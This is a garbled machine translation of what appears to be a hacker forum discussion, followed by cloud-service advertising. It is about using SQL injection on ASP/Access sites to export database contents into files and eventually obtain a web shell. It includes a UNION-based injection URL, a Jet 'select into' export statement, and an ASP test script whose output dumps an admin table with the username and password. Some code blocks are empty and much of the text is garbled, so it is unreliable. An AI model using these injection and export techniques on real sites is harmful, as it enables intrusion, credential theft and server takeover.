So I checked the information on the Internet at night and found that there were several export database studies.
| Program code: | |
|
| Exported to a TXT file. The file is successfully exported.
| Program code: | |
|
| Exported to the DBF file.
However, files that cannot be exported to ASP or other suffixes are indeed a bit weird. I personally think they are selected in a type such as 'text; 'and 'dbase IV. So I checked the ODBC data source, and it seems that there is no custom type. It is very depressing .....
There is no way. I asked him about superhei... He said he hasn't studied it either. Hey hey, it's still a new idea... it seems I want to study more.
. Soon, I found an article in chinaasppro that I could export the database like this, that is, back up some data. But I failed to execute the command in the MySQL database manager of veterans. I do not know the cause. but after reading it carefully, the C:/temp. importing MDB into MERs Mers is nothing to export. ah. bad luck ..
| Program code: | |
|
I remember a long time ago I saw an article about how to export database files into arbitrary files. In this case, shell can be obtained. but I still did not succeed. If anyone successfully added me QQ, let's discuss it together.
9817500
In fact, if possible, it is still simple, such as an injection point.
Http://www.www.com/a.asp? Id = 1
We can change it like this.
Www.com/a.asp? Id =-1 Union select 1, 2, 4, 5, said, 7, 8, 9 from users where id = 1
In this way, we get the content of the said file, and then we can export it like this: for example, importing it into a TXT file
Www.com/a.asp? Id =-1 Union select 1, 2, 4, 5, said, 7, 8, 9 from users where id = 1 into export hackedbykevin.txt] In 'e:/''text; 'from users where id = 1
In theory, E:/hackedbykevin.txt is generated.
But I had a very depressing thing during the test, and I don't know why ....
| Reference content: | |
|
It's very late. I haven't studied it any more... I have studied it for you. The hacker spirit is sharing.
Using into at the end of union is not feasible. I have tested it before.
Union does not work. However, when I got a leadbbs, I used the SQL statement in it to execute it once, but it didn't use Union. Let's discuss with you later. Recently I really want to get the ASP + MySQL system... Let's take a look at the 4ngel stuff. Let's call Xiao.
Xixi has no time to test it last time. I tested it today.
<%
Set conn = server. Createobject ("ADODB. Connection ")
DSN = "provider = Microsoft. Jet. oledb.4.0; Data Source =" & server. mappath ("Q. mdb ")
Set rs = server. Createobject ("ADODB. recordset ")
Conn. Open DSN
SQL = "select * into export mytest112.txt] In 'C:/'text;' from admin ;"
Rs. Open SQL, Conn
If Rs. EOF and Rs. bof then
'Access denied
Else
'Access allowed
End if
Rs. Close
Set rs = nothing
'Close the connection
Conn. Close
Set conn = nothing
Response. Write "SQL:" & SQL
%>
This is successful.
C:/> dir mytest *. txt
The volume in drive C is aaaaaaa
The serial number of the volume is 3cee-a8a9.
C:/directory
46 mytest112.txt
One file contains 46 bytes.
0 directories, 885,846,016 available bytes
C:/> type mytest112.txt
"ID", "f_name", "f_password"
1, "admin", "pass"
Because the statement select * into export mytest112.txt] In 'C:/'text;' from admin; Because into export mytest112.txt] In 'C:/'text; the reason for the location of 'cannot be exported in the injection (select * from Admin where id = $ id)
If Union is used, the following error occurs: (however, even if it can be used, it doesn't make much sense, because if it cannot be exported
ASP and so on, it is not necessary to export data only because union can be directly replaced :)
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
